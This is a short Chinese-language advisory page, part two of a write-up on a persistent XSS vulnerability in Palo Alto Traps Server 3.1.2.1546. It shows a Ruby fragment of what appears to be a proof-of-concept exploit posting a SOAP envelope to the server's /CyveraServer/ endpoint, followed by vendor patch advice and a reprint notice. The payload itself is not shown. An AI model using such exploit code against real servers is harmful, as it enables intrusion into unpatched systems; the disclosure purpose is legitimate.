Palo Alto Traps Server 3.1.2.1546持续性XSS漏洞(2)

Net::HTTP.start(traps[:server], traps[:port]) do |http|
    r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);
    puts r1
    puts r1.inspect
 end

建议:
厂商补丁:

Palo Alto Network
 -----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://www.paloaltonetworks.com/products/endpoint-security.html

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/328e14b5dabf7ef3704303e203dd914e.html